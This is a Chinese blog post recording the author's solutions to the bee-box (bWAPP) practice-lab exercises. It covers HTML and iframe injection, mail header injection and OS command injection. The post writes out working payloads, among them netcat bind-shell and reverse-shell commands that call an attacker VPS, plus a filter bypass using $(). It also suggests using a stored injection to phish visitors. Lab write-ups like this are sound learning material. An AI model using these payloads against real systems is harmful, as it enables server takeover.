这篇博客就是为了记下bee-box做题过程,随便记记,免得忘了
安装
先去官网下载了,然后分个新的盘单独放进去,打开虚拟机,双击bee-box.vmx就能安装了
打开里面的火狐会自动跳去一个登录界面,默认账号和密码是bee/bug,登录然后就能做题了
我是美丽的分割线-------------------------------------
接下来讲漏洞
HTML Injection Reflected (GET)
First name输入<a href=http://www.baidu.com>click here!!!</a>,Last name任意,发现可以回显一个超链接,然后点击了确实可以去到百度,证明这个页面对数据没有过滤好,可以插入任意代码,导致html注入成功
HTML Injection Reflected (POST)
这里跟刚刚的get方法的没什么区别,也没没有过滤好,可以插入任意代码
HTML Injection Reflected (url)
这题看源码可以看到是会将数据包的host拿下来,然后拼接到url去进行访问,所以只要抓包改包就能进行任意访问了
HTML Injection Stored (Blog)
这题进去看见一个类似留言板的东西,直接在里面加个a标签发现是可以进行访问的,所以可以进行反射型xss,钓鱼到自己的网站
iFrame Injection
这题点进去看见有个url,有三个参数,一个url,一个width和一个height,再看一下网站源码,也可以看到有个iframe框,里面也有三个参数,刚刚是对应的
猜测后台是将这三个参数拿到了,然后直接插进iframe里面,尝试一下修改一个url为百度
发现确实能成功访问,所以这就是一个iframe注入点了
LDAP Injection(search)
这题看了肉鸡一个下午都没懂,很懵逼,先放一放
Mail Header Injection(SMTP)
这关是邮箱注入,其实就是利用换行符去进行参数的添加与执行,但是现在的邮件全部都是smtp加密传送,除非能有一台不需要验证smtp的服务器,否则进行不了注入,但是可以试一下phpmailer,具体参考一下CVE-2017-5223,这里就不详细讲了
OS Command Injection
low
这题是命令执行,直接在后面加个ls发现能看到文件是什么
监听一下弹shell
在输入框输入 && nc -vlp 4444 -e /bin/bash
能看见浏览器一直在响应,本地看下端口
4444端口确实被用了,再监听一下,用spawn去拿shell
发现确实可以回弹shell
medium
这里跟low不同的是过滤了&和; 但是我们可以用$(nc -vlp 2333 -e /bin/bash)去监听,然后再nc弹shell,跟low的基本操作一样,就不演示了
high
这题在medium的基础上加多一个escapeshellcmd()函数,所以就连一般的引号反引号也不能用了,但是还是可以用medium的方法做出来,继续不演示,手动滑稽
OS Command Injection Blind
跟os command injection差不多,只是判断根据时间判断。不输入ip去ping,后台直接返回错误信息,用时最少,大概3ms;正常的ping时间比较短,大概17ms;在ip后面加可执行代码,大概25ms,如果加的是不可执行的代码,那就会在前两者的时间之间,也就是17-25ms,所以可以利用这个去判断是否正确。
这里来个牛逼的操作,虽然没有回显,但是我们还是可以回弹shell,因为虽然没回显,但是通过前面的测试,还是可以知道他是会执行代码的,所以我们可以继续在后面加命令执行语句
具体操作
首先找个机子监听,然后网页输入vps_ip && nc -vn vps_ip port -e /bin/bash
嗯,没错,就是bash去getshell,然后就可以发现成功回弹shell了